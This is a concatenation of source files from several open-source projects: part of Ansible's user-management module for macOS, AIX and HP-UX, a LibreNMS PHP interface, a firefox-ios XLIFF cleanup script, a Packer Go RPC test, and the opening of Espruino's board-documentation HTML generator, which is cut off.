SHADOWFILE = None
dscl_directory = '.'
fields = [
('comment', 'RealName'),
('home', 'NFSHomeDirectory'),
('shell', 'UserShell'),
('uid', 'UniqueID'),
('group', 'PrimaryGroupID'),
('hidden', 'IsHidden'),
]
def __init__(self, module):
super(DarwinUser, self).__init__(module)
# make the user hidden if option is set or deffer to system option
if self.hidden is None:
if self.system:
self.hidden = 1
elif self.hidden:
self.hidden = 1
else:
self.hidden = 0
# add hidden to processing if set
if self.hidden is not None:
self.fields.append(('hidden', 'IsHidden'))
def _get_dscl(self):
return [self.module.get_bin_path('dscl', True), self.dscl_directory]
def _list_user_groups(self):
cmd = self._get_dscl()
cmd += ['-search', '/Groups', 'GroupMembership', self.name]
(rc, out, err) = self.execute_command(cmd, obey_checkmode=False)
groups = []
for line in out.splitlines():
if line.startswith(' ') or line.startswith(')'):
continue
groups.append(line.split()[0])
return groups
def _get_user_property(self, property):
'''Return user PROPERTY as given my dscl(1) read or None if not found.'''
cmd = self._get_dscl()
cmd += ['-read', '/Users/%s' % self.name, property]
(rc, out, err) = self.execute_command(cmd, obey_checkmode=False)
if rc != 0:
return None
# from dscl(1)
# if property contains embedded spaces, the list will instead be
# displayed one entry per line, starting on the line after the key.
lines = out.splitlines()
# sys.stderr.write('*** |%s| %s -> %s\n' % (property, out, lines))
if len(lines) == 1:
return lines[0].split(': ')[1]
else:
if len(lines) > 2:
return '\n'.join([lines[1].strip()] + lines[2:])
else:
if len(lines) == 2:
return lines[1].strip()
else:
return None
def _get_next_uid(self, system=None):
'''
Return the next available uid. If system=True, then
uid should be below of 500, if possible.
'''
cmd = self._get_dscl()
cmd += ['-list', '/Users', 'UniqueID']
(rc, out, err) = self.execute_command(cmd, obey_checkmode=False)
if rc != 0:
self.module.fail_json(
msg="Unable to get the next available uid",
rc=rc,
out=out,
err=err
)
max_uid = 0
max_system_uid = 0
for line in out.splitlines():
current_uid = int(line.split(' ')[-1])
if max_uid < current_uid:
max_uid = current_uid
if max_system_uid < current_uid and current_uid < 500:
max_system_uid = current_uid
if system and (0 < max_system_uid < 499):
return max_system_uid + 1
return max_uid + 1
def _change_user_password(self):
'''Change password for SELF.NAME against SELF.PASSWORD.
Please note that password must be cleartext.
'''
# some documentation on how is stored passwords on OSX:
# http://blog.lostpassword.com/2012/07/cracking-mac-os-x-lion-accounts-passwords/
# http://null-byte.wonderhowto.com/how-to/hack-mac-os-x-lion-passwords-0130036/
# http://pastebin.com/RYqxi7Ca
# on OSX 10.8+ hash is SALTED-SHA512-PBKDF2
# https://pythonhosted.org/passlib/lib/passlib.hash.pbkdf2_digest.html
# https://gist.github.com/nueh/8252572
cmd = self._get_dscl()
if self.password:
cmd += ['-passwd', '/Users/%s' % self.name, self.password]
else:
cmd += ['-create', '/Users/%s' % self.name, 'Password', '*']
(rc, out, err) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(msg='Error when changing password', err=err, out=out, rc=rc)
return (rc, out, err)
def _make_group_numerical(self):
'''Convert SELF.GROUP to is stringed numerical value suitable for dscl.'''
if self.group is None:
self.group = 'nogroup'
try:
self.group = grp.getgrnam(self.group).gr_gid
except KeyError:
self.module.fail_json(msg='Group "%s" not found. Try to create it first using "group" module.' % self.group)
# We need to pass a string to dscl
self.group = str(self.group)
def __modify_group(self, group, action):
'''Add or remove SELF.NAME to or from GROUP depending on ACTION.
ACTION can be 'add' or 'remove' otherwise 'remove' is assumed. '''
if action == 'add':
option = '-a'
else:
option = '-d'
cmd = ['dseditgroup', '-o', 'edit', option, self.name, '-t', 'user', group]
(rc, out, err) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(msg='Cannot %s user "%s" to group "%s".'
% (action, self.name, group), err=err, out=out, rc=rc)
return (rc, out, err)
def _modify_group(self):
'''Add or remove SELF.NAME to or from GROUP depending on ACTION.
ACTION can be 'add' or 'remove' otherwise 'remove' is assumed. '''
rc = 0
out = ''
err = ''
changed = False
current = set(self._list_user_groups())
if self.groups is not None:
target = set(self.groups.split(','))
else:
target = set([])
if self.append is False:
for remove in current - target:
(_rc, _err, _out) = self.__modify_group(remove, 'delete')
rc += rc
out += _out
err += _err
changed = True
for add in target - current:
(_rc, _err, _out) = self.__modify_group(add, 'add')
rc += _rc
out += _out
err += _err
changed = True
return (rc, err, out, changed)
def _update_system_user(self):
'''Hide or show user on login window according SELF.SYSTEM.
Returns 0 if a change has been made, None otherwise.'''
plist_file = '/Library/Preferences/com.apple.loginwindow.plist'
# http://support.apple.com/kb/HT5017?viewlocale=en_US
cmd = ['defaults', 'read', plist_file, 'HiddenUsersList']
(rc, out, err) = self.execute_command(cmd, obey_checkmode=False)
# returned value is
# (
# "_userA",
# "_UserB",
# userc
# )
hidden_users = []
for x in out.splitlines()[1:-1]:
try:
x = x.split('"')[1]
except IndexError:
x = x.strip()
hidden_users.append(x)
if self.system:
if self.name not in hidden_users:
cmd = ['defaults', 'write', plist_file, 'HiddenUsersList', '-array-add', self.name]
(rc, out, err) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(msg='Cannot user "%s" to hidden user list.' % self.name, err=err, out=out, rc=rc)
return 0
else:
if self.name in hidden_users:
del (hidden_users[hidden_users.index(self.name)])
cmd = ['defaults', 'write', plist_file, 'HiddenUsersList', '-array'] + hidden_users
(rc, out, err) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(msg='Cannot remove user "%s" from hidden user list.' % self.name, err=err, out=out, rc=rc)
return 0
def user_exists(self):
'''Check is SELF.NAME is a known user on the system.'''
cmd = self._get_dscl()
cmd += ['-list', '/Users/%s' % self.name]
(rc, out, err) = self.execute_command(cmd, obey_checkmode=False)
return rc == 0
def remove_user(self):
'''Delete SELF.NAME. If SELF.FORCE is true, remove its home directory.'''
info = self.user_info()
cmd = self._get_dscl()
cmd += ['-delete', '/Users/%s' % self.name]
(rc, out, err) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(msg='Cannot delete user "%s".' % self.name, err=err, out=out, rc=rc)
if self.force:
if os.path.exists(info[5]):
shutil.rmtree(info[5])
out += "Removed %s" % info[5]
return (rc, out, err)
def create_user(self, command_name='dscl'):
cmd = self._get_dscl()
cmd += ['-create', '/Users/%s' % self.name]
(rc, err, out) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(msg='Cannot create user "%s".' % self.name, err=err, out=out, rc=rc)
self._make_group_numerical()
if self.uid is None:
self.uid = str(self._get_next_uid(self.system))
# Homedir is not created by default
if self.create_home:
if self.home is None:
self.home = '/Users/%s' % self.name
if not self.module.check_mode:
if not os.path.exists(self.home):
os.makedirs(self.home)
self.chown_homedir(int(self.uid), int(self.group), self.home)
# dscl sets shell to /usr/bin/false when UserShell is not specified
# so set the shell to /bin/bash when the user is not a system user
if not self.system and self.shell is None:
self.shell = '/bin/bash'
for field in self.fields:
if field[0] in self.__dict__ and self.__dict__[field[0]]:
cmd = self._get_dscl()
cmd += ['-create', '/Users/%s' % self.name, field[1], self.__dict__[field[0]]]
(rc, _err, _out) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(msg='Cannot add property "%s" to user "%s".' % (field[0], self.name), err=err, out=out, rc=rc)
out += _out
err += _err
if rc != 0:
return (rc, _err, _out)
(rc, _err, _out) = self._change_user_password()
out += _out
err += _err
self._update_system_user()
# here we don't care about change status since it is a creation,
# thus changed is always true.
if self.groups:
(rc, _out, _err, changed) = self._modify_group()
out += _out
err += _err
return (rc, err, out)
def modify_user(self):
changed = None
out = ''
err = ''
if self.group:
self._make_group_numerical()
for field in self.fields:
if field[0] in self.__dict__ and self.__dict__[field[0]]:
current = self._get_user_property(field[1])
if current is None or current != self.__dict__[field[0]]:
cmd = self._get_dscl()
cmd += ['-create', '/Users/%s' % self.name, field[1], self.__dict__[field[0]]]
(rc, _err, _out) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(
msg='Cannot update property "%s" for user "%s".'
% (field[0], self.name), err=err, out=out, rc=rc)
changed = rc
out += _out
err += _err
if self.update_password == 'always' and self.password is not None:
(rc, _err, _out) = self._change_user_password()
out += _out
err += _err
changed = rc
if self.groups:
(rc, _out, _err, _changed) = self._modify_group()
out += _out
err += _err
if _changed is True:
changed = rc
rc = self._update_system_user()
if rc == 0:
changed = rc
return (changed, out, err)
class AIX(User):
"""
This is a AIX User manipulation class.
This overrides the following methods from the generic class:-
- create_user()
- remove_user()
- modify_user()
"""
platform = 'AIX'
distribution = None
SHADOWFILE = '/etc/security/passwd'
def remove_user(self):
cmd = [self.module.get_bin_path('userdel', True)]
if self.remove:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def create_user_useradd(self, command_name='useradd'):
cmd = [self.module.get_bin_path(command_name, True)]
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None and len(self.groups):
groups = self.get_groups_set()
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.create_home:
cmd.append('-m')
if self.skeleton is not None:
cmd.append('-k')
cmd.append(self.skeleton)
cmd.append(self.name)
(rc, out, err) = self.execute_command(cmd)
# set password with chpasswd
if self.password is not None:
cmd = []
cmd.append(self.module.get_bin_path('chpasswd', True))
cmd.append('-e')
cmd.append('-c')
self.execute_command(cmd, data="%s:%s" % (self.name, self.password))
return (rc, out, err)
def modify_user_usermod(self):
cmd = [self.module.get_bin_path('usermod', True)]
info = self.user_info()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
current_groups = self.user_group_membership()
groups_need_mod = False
groups = []
if self.groups == '':
if current_groups and not self.append:
groups_need_mod = True
else:
groups = self.get_groups_set()
group_diff = set(current_groups).symmetric_difference(groups)
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
if self.move_home:
cmd.append('-m')
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
# skip if no changes to be made
if len(cmd) == 1:
(rc, out, err) = (None, '', '')
else:
cmd.append(self.name)
(rc, out, err) = self.execute_command(cmd)
# set password with chpasswd
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
cmd = []
cmd.append(self.module.get_bin_path('chpasswd', True))
cmd.append('-e')
cmd.append('-c')
(rc2, out2, err2) = self.execute_command(cmd, data="%s:%s" % (self.name, self.password))
else:
(rc2, out2, err2) = (None, '', '')
if rc is not None:
return (rc, out + out2, err + err2)
else:
return (rc2, out + out2, err + err2)
class HPUX(User):
"""
This is a HP-UX User manipulation class.
This overrides the following methods from the generic class:-
- create_user()
- remove_user()
- modify_user()
"""
platform = 'HP-UX'
distribution = None
SHADOWFILE = '/etc/shadow'
def create_user(self):
cmd = ['/usr/sam/lbin/useradd.sam']
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None and len(self.groups):
groups = self.get_groups_set()
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.password is not None:
cmd.append('-p')
cmd.append(self.password)
if self.create_home:
cmd.append('-m')
else:
cmd.append('-M')
if self.system:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def remove_user(self):
cmd = ['/usr/sam/lbin/userdel.sam']
if self.force:
cmd.append('-F')
if self.remove:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def modify_user(self):
cmd = ['/usr/sam/lbin/usermod.sam']
info = self.user_info()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
current_groups = self.user_group_membership()
groups_need_mod = False
groups = []
if self.groups == '':
if current_groups and not self.append:
groups_need_mod = True
else:
groups = self.get_groups_set(remove_existing=False)
group_diff = set(current_groups).symmetric_difference(groups)
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
cmd.append('-G')
new_groups = groups
if self.append:
new_groups = groups | set(current_groups)
cmd.append(','.join(new_groups))
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
cmd.append('-d')
cmd.append(self.home)
if self.move_home:
cmd.append('-m')
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
cmd.append('-F')
cmd.append('-p')
cmd.append(self.password)
# skip if no changes to be made
if len(cmd) == 1:
return (None, '', '')
cmd.append(self.name)
return self.execute_command(cmd)
def main():
ssh_defaults = dict(
bits=0,
type='rsa',
passphrase=None,
comment='ansible-generated on %s' % socket.gethostname()
)
module = AnsibleModule(
argument_spec=dict(
state=dict(type='str', default='present', choices=['absent', 'present']),
name=dict(type='str', required=True, aliases=['user']),
uid=dict(type='int'),
non_unique=dict(type='bool', default=False),
group=dict(type='str'),
groups=dict(type='list'),
comment=dict(type='str'),
home=dict(type='path'),
shell=dict(type='str'),
password=dict(type='str', no_log=True),
login_class=dict(type='str'),
# following options are specific to macOS
hidden=dict(type='bool'),
# following options are specific to selinux
seuser=dict(type='str'),
# following options are specific to userdel
force=dict(type='bool', default=False),
remove=dict(type='bool', default=False),
# following options are specific to useradd
create_home=dict(type='bool', default=True, aliases=['createhome']),
skeleton=dict(type='str'),
system=dict(type='bool', default=False),
# following options are specific to usermod
move_home=dict(type='bool', default=False),
append=dict(type='bool', default=False),
# following are specific to ssh key generation
generate_ssh_key=dict(type='bool'),
ssh_key_bits=dict(type='int', default=ssh_defaults['bits']),
ssh_key_type=dict(type='str', default=ssh_defaults['type']),
ssh_key_file=dict(type='path'),
ssh_key_comment=dict(type='str', default=ssh_defaults['comment']),
ssh_key_passphrase=dict(type='str', no_log=True),
update_password=dict(type='str', default='always', choices=['always', 'on_create']),
expires=dict(type='float'),
password_lock=dict(type='bool'),
local=dict(type='bool'),
profile=dict(type='str'),
authorization=dict(type='str'),
role=dict(type='str'),
),
supports_check_mode=True
)
user = User(module)
user.check_password_encrypted()
module.debug('User instantiated - platform %s' % user.platform)
if user.distribution:
module.debug('User instantiated - distribution %s' % user.distribution)
rc = None
out = ''
err = ''
result = {}
result['name'] = user.name
result['state'] = user.state
if user.state == 'absent':
if user.user_exists():
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = user.remove_user()
if rc != 0:
module.fail_json(name=user.name, msg=err, rc=rc)
result['force'] = user.force
result['remove'] = user.remove
elif user.state == 'present':
if not user.user_exists():
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = user.create_user()
if module.check_mode:
result['system'] = user.name
else:
result['system'] = user.system
result['create_home'] = user.create_home
else:
# modify user (note: this function is check mode aware)
(rc, out, err) = user.modify_user()
result['append'] = user.append
result['move_home'] = user.move_home
if rc is not None and rc != 0:
module.fail_json(name=user.name, msg=err, rc=rc)
if user.password is not None:
result['password'] = 'NOT_LOGGING_PASSWORD'
if rc is None:
result['changed'] = False
else:
result['changed'] = True
if out:
result['stdout'] = out
if err:
result['stderr'] = err
if user.user_exists() and user.state == 'present':
info = user.user_info()
if info is False:
result['msg'] = "failed to look up user name: %s" % user.name
result['failed'] = True
result['uid'] = info[2]
result['group'] = info[3]
result['comment'] = info[4]
result['home'] = info[5]
result['shell'] = info[6]
if user.groups is not None:
result['groups'] = user.groups
# handle missing homedirs
info = user.user_info()
if user.home is None:
user.home = info[5]
if not os.path.exists(user.home) and user.create_home:
if not module.check_mode:
user.create_homedir(user.home)
user.chown_homedir(info[2], info[3], user.home)
result['changed'] = True
# deal with ssh key
if user.sshkeygen:
# generate ssh key (note: this function is check mode aware)
(rc, out, err) = user.ssh_key_gen()
if rc is not None and rc != 0:
module.fail_json(name=user.name, msg=err, rc=rc)
if rc == 0:
result['changed'] = True
(rc, out, err) = user.ssh_key_fingerprint()
if rc == 0:
result['ssh_fingerprint'] = out.strip()
else:
result['ssh_fingerprint'] = err.strip()
result['ssh_key_file'] = user.get_ssh_key_path()
result['ssh_public_key'] = user.get_ssh_public_key()
module.exit_json(**result)
# import module snippets
if __name__ == '__main__':
main()
| EvanK/ansible | lib/ansible/modules/system/user.py | Python | gpl-3.0 | 97,224 |
<?php
/**
* WirelessChannelPolling.php
*
* Custom polling interface for Wireless Channel. Type is channel.
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
* @link http://librenms.org
* @copyright 2021 Janno Schouwenburg
* @author Janno Schouwenburg <handel@janno.com>
*/
namespace LibreNMS\Interfaces\Polling\Sensors;
interface WirelessChannelPolling
{
/**
* Poll Wireless Channel. Type is channel.
* The returned array should be sensor_id => value pairs
*
* @param array $sensors Array of sensors needed to be polled
* @return array of polled data
*/
public function pollWirelessChannel(array $sensors);
}
| nwautomator/librenms | LibreNMS/Interfaces/Polling/Sensors/WirelessChannelPolling.php | PHP | gpl-3.0 | 1,268 |
#!/usr/bin/env python
#
# xliff-cleanup.py <files>
#
# 1. Remove all <file> sections that we do not care about. We only care about the
# the one for our main app and those for our extensions.
#
# 2. Look at all remaining <file> sections and remove those strings that should not
# be localized. Currently that means: CFBundleDisplayName, CFBundleName and
# CFBundleShortVersionString.
#
# 3. Remove all remaining <file> sections that are now have no <trans-unit> nodes
# in their <body> anymore.
#
# Modifies files in place. Makes no backup.
#
import sys
from lxml import etree
NS = {'x':'urn:oasis:names:tc:xliff:document:1.2'}
FILES_TO_KEEP = ('Client/Info.plist',
'Extensions/ShareTo/Info.plist',
'Extensions/SendTo/Info.plist',
'Extensions/Today/Info.plist',
'Extensions/ViewLater/Info.plist')
STRINGS_TO_REMOVE = ('CFBundleDisplayName',
'CFBundleName',
'CFBundleShortVersionString')
if __name__ == "__main__":
for path in sys.argv[1:]:
# Read it in and modify it in memory
with open(path) as fp:
tree = etree.parse(fp)
root = tree.getroot()
# 1. Remove sections we do not care about
for file_node in root.xpath("//x:file", namespaces=NS):
original = file_node.get('original')
if original and original.endswith('Info.plist'):
if file_node.get('original') not in FILES_TO_KEEP:
file_node.getparent().remove(file_node)
# 2. Remove strings we don't want to be translated
for file_node in root.xpath("//x:file", namespaces=NS):
original = file_node.get('original')
if original and original.endswith('Info.plist'):
for trans_unit_node in file_node.xpath("./x:body/x:trans-unit", namespaces=NS):
id = trans_unit_node.get('id')
# TODO we should probably do the exception for SendTo in a nicer way with some kind of whitelist
if id and id in STRINGS_TO_REMOVE and not ((original == "Extensions/SendTo/Info.plist" and id == "CFBundleDisplayName") or (original == "Extensions/ViewLater/Info.plist" and id == "CFBundleDisplayName")):
trans_unit_node.getparent().remove(trans_unit_node)
# 3. Remove empty file sections
for file_node in root.xpath("//x:file", namespaces=NS):
original = file_node.get('original')
if original and original.endswith('Info.plist'):
trans_unit_nodes = file_node.xpath("x:body/x:trans-unit", namespaces=NS)
if len(trans_unit_nodes) == 0:
file_node.getparent().remove(file_node)
# Write it back to the same file
with open(path, "w") as fp:
fp.write(etree.tostring(tree))
| doronkatz/firefox-ios | scripts/xliff-cleanup.py | Python | mpl-2.0 | 2,992 |
package rpc
import (
"cgl.tideland.biz/asserts"
"github.com/mitchellh/packer/packer"
"net/rpc"
"testing"
)
type TestCommand struct {
runArgs []string
runCalled bool
runEnv packer.Environment
}
func (tc *TestCommand) Help() string {
return "bar"
}
func (tc *TestCommand) Run(env packer.Environment, args []string) int {
tc.runCalled = true
tc.runArgs = args
tc.runEnv = env
return 0
}
func (tc *TestCommand) Synopsis() string {
return "foo"
}
func TestRPCCommand(t *testing.T) {
assert := asserts.NewTestingAsserts(t, true)
// Create the command
command := new(TestCommand)
// Start the server
server := rpc.NewServer()
RegisterCommand(server, command)
address := serveSingleConn(server)
// Create the command client over RPC and run some methods to verify
// we get the proper behavior.
client, err := rpc.Dial("tcp", address)
assert.Nil(err, "should be no error")
clientComm := Command(client)
//Test Help
help := clientComm.Help()
assert.Equal(help, "bar", "helps hould be correct")
// Test run
runArgs := []string{"foo", "bar"}
testEnv := &testEnvironment{}
exitCode := clientComm.Run(testEnv, runArgs)
assert.Equal(command.runArgs, runArgs, "Correct args should be sent")
assert.Equal(exitCode, 0, "Exit code should be correct")
assert.NotNil(command.runEnv, "should have an env")
if command.runEnv != nil {
command.runEnv.Ui()
assert.True(testEnv.uiCalled, "UI should be called on env")
}
// Test Synopsis
synopsis := clientComm.Synopsis()
assert.Equal(synopsis, "foo", "Synopsis should be correct")
}
func TestCommand_Implements(t *testing.T) {
assert := asserts.NewTestingAsserts(t, true)
var r packer.Command
c := Command(nil)
assert.Implementor(c, &r, "should be a Builder")
}
| msabramo/packer | packer/rpc/command_test.go | GO | mpl-2.0 | 1,756 |
#!/usr/bin/python
# This file is part of Espruino, a JavaScript interpreter for Microcontrollers
#
# Copyright (C) 2013 Gordon Williams <gw@pur3.co.uk>
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
#
# ----------------------------------------------------------------------------------------
# Builds HTML documentation from the files in the boards directory
# ----------------------------------------------------------------------------------------
import subprocess;
import re;
import json;
import sys;
import os;
import importlib;
scriptdir = os.path.dirname(os.path.realpath(__file__))
basedir = scriptdir+"/../"
sys.path.append(basedir+"scripts");
sys.path.append(basedir+"boards");
import pinutils;
# -----------------------------------------------------------------------------------------
# Now scan AF file
print "Script location "+scriptdir
embeddable = False
boardname = ""
if len(sys.argv)==3 and sys.argv[2]=="pinout":
embeddable = True
boardname = sys.argv[1]
if len(sys.argv)==2:
boardname = sys.argv[1]
if boardname=="":
print "ERROR..."
print "USAGE: build_board_docs.py BOARD_NAME [pinout]"
print " 'pinout' will output embeddable HTML of just the pinout"
exit(1)
print "BOARD "+boardname
#htmlFilename = sys.argv[2]
htmlFilename = "boards/"+boardname+".html"
print "HTML_FILENAME "+htmlFilename
htmlFile = open(htmlFilename, 'w')
def writeHTML(s): htmlFile.write(s+"\n");
# import the board def
board = importlib.import_module(boardname)
# Call the included board_specific file - it sets up 'pins' and 'fill_gaps'
pins = board.get_pins()
pins = pinutils.append_devices_to_pin_list(pins, board)
#if not embeddable and "link" in board.info and board.info["link"][0].startswith("http://www.espruino.com"):
# writeHTML('<html><head><meta http-equiv="refresh" content="0; url="'+board.info["link"][0]+'"></head><body>Please wait. redirecting...</body></html>');
# exit(0);
# -----------------------------------------------------------------------------------------
functionsOnBoard = [];
for pin in pins:
if pin["name"][0] == 'P':
pin["name"] = pin["name"][1:];
for func in pin["functions"]:
if func in pinutils.CLASSES:
if not pinutils.CLASSES[func] in functionsOnBoard:
functionsOnBoard.append(pinutils.CLASSES[func])
pinmap = {};
if '_pinmap' in board.board:
pinmap = board.board['_pinmap'];
# -----------------------------------------------------------------------------------------
def dump_pin(pin, pinstrip):
if pin in pinmap:
pin = pinmap[pin];
pininfo = pinutils.findpin(pins, pin, False)
not_five_volt = False
# print(json.dumps(pininfo))
if ("csv" in pininfo) and ("IO" in pininfo["csv"]) and ("Type" in pininfo["csv"]) and (pininfo["csv"]["Type"]=="I/O") and (pininfo["csv"]["IO"]!="FT") :
not_five_volt = True
writeHTML(' <DIV class="'+pinstrip+'pin pin">');
pinHTML = ' <SPAN class="pinname">'+pin+"</SPAN>";
pinHTML2 = '';
if not_five_volt:
pinHTML2 += '<SPAN class="pinfunction NOT_5V" title="Not 5v Tolerant">3.3v</SPAN>\n';
if ("_notes" in board.board) and (pin in board.board["_notes"]):
pinHTML2 += '<SPAN class="pinfunction NOTE" title="'+board.board["_notes"][pin]+'">!</SPAN>\n';
reverse = pinstrip=="left" or pinstrip=="right2";
if not reverse: writeHTML(pinHTML+"\n"+pinHTML2)
pinfuncs = {}
for func in sorted(pininfo["functions"]):
# writeHTML(' '+func)
if func in pinutils.CLASSES:
funcdata = str(pininfo["functions"][func])
cls = pinutils.CLASSES[func]
name = cls
title = func
if cls=="I2C" or cls=="SPI" or cls=="USART": name=func.replace("_"," ")
if cls=="DEVICE" and funcdata[:4]=="pin_":
title = title + " ("+funcdata[4:]+")";
# print title
if func in pinutils.NAMES: name = pinutils.NAMES[func]
writeHTML('<!-- '+func+' -->')
if name in pinfuncs:
pinfuncs[name]["title"] = pinfuncs[name]["title"] + " " + title
else:
pinfuncs[name] = { 'cls': cls, 'title': "["+pin+"] "+title, 'name': name, 'id': pin+"_"+func, 'func' : func };
for func in sorted(pinfuncs.items(),key=lambda x: x[1]['cls']):
pf = func[1]
url = False
if pf["cls"] in pinutils.URLS: url = pinutils.URLS[pf["cls"]]
if pf["func"] in pinutils.URLS: url = pinutils.URLS[pf["func"]]
if url != False: writeHTML(' <A href="'+url+'" class="pinfunctionlink">');
writeHTML(' <SPAN class="pinfunction '+pf["cls"]+'" title="'+pf["title"]+'" onMouseOver="showTT(\''+pf["id"]+'\')" onMouseOut="hideTT(\''+pf["id"]+'\')">'+pf["name"]+'</SPAN>')
if url != False: writeHTML(' </A>');
writeHTML(' <SPAN class="pintooltip" id="'+pf["id"]+'" style="display:none;">'+pf["title"]+'</SPAN>')
if reverse: writeHTML(pinHTML2+"\n"+pinHTML)
writeHTML(' </DIV>')
if not embeddable:
writeHTML("""<HTML>
<HEAD>
""");
writeHTML(""" <STYLE>
#boardcontainer { position: relative; }
#board {
position: absolute;
background-size: 100% auto; # width and height, can be %, px or whatever.
}
.pin { padding: 1px; height: 20px; }
.pinname {
background-color: #FFF;
border:1px solid black;
padding-left: 2px;
padding-right: 2px;
font-weight: bold;
}
.pinfunction {
border:1px solid black;
border-radius:3px;
padding-left: 2px;
padding-right: 2px;
}
.pinfunctionlink {
color : black;
text-decoration: none;
}
.pintooltip {
background-color: #FFD;
border:1px solid black;
padding-left: 2px;
padding-right: 2px;
font-weight: bold;
position: absolute;
z-index: 100;
}
.SPI { background-color: #8F8; }
.ADC { background-color: #88F; }
.DAC { background-color: #0CC; }
.PWM { background-color: #8FF; }
.USART { background-color: #FF8; }
.CAN { background-color: #8CC; }
.I2C { background-color: #F88; }
.DEVICE { background-color: #F8F; }
.NOT_5V { background-color: #FDD; }
.NOTE { background-color: #F80; }
#top { white-space: nowrap; }
#top2 { white-space: nowrap; }
#bottom { white-space: nowrap; }
#bottom2 { white-space: nowrap; }
#left { text-align:right; }
#right2 { text-align:right; }
.toppin {
-webkit-transform: rotate(-90deg);
-moz-transform: rotate(-90deg);
-ms-transform: rotate(-90deg);
-o-transform: rotate(-90deg);
transform: rotate(-90deg);
display: inline-block;
width: 20px;
}
.top2pin {
-webkit-transform: rotate(90deg);
-moz-transform: rotate(90deg);
-ms-transform: rotate(90deg);
-o-transform: rotate(90deg);
transform: rotate(90deg);
display: inline-block;
width: 20px;
}
.bottompin {
-webkit-transform: rotate(90deg);
-moz-transform: rotate(90deg);
-ms-transform: rotate(90deg);
-o-transform: rotate(90deg);
transform: rotate(90deg);
display: inline-block;
width: 20px;
}
.bottom2pin {
-webkit-transform: rotate(-90deg);
-moz-transform: rotate(-90deg);
-ms-transform: rotate(-90deg);
-o-transform: rotate(-90deg);
transform: rotate(-90deg);
display: inline-block;
width: 20px;
}
.line {
height:2px;background-color:red;position:absolute;
}
.line:hover {
background-color:#FF00FF;
}
""");
for pinstrip in board.board:
if pinstrip[0]!='_':
writeHTML(" #"+pinstrip+" { position: absolute; }")
writeHTML(" ."+pinstrip+"pin { white-space: nowrap; }")
writeHTML(board.board_css)
writeHTML(" </STYLE>"+'<script src="http://code.jquery.com/jquery-1.11.0.min.js"></script>')
writeHTML("""
<SCRIPT type="text/javascript">
function showTT(ttid) {
var e = document.getElementById(ttid);
e.style.display = 'block';
}
function hideTT(ttid) {
var e = document.getElementById(ttid);
e.style.display = 'none';
}
function drawLine(x1, y1, x2, y2, hover) {
if (x2 < x1) {
var temp = x1;
x1 = x2;
x2 = temp;
temp = y1;
y1 = y2;
y2 = temp;
}
var line = $('<div class="line" alt="'+hover+'"></div>').appendTo($("body"));
var length = Math.sqrt((x1 - x2) * (x1 - x2) + (y1 - y2) * (y1 - y2));
line.css('width', length + "px");
var angle = Math.atan((y2 - y1) / (x2 - x1));
line.css('top', y1 + 0.5 * length * Math.sin(angle) + "px");
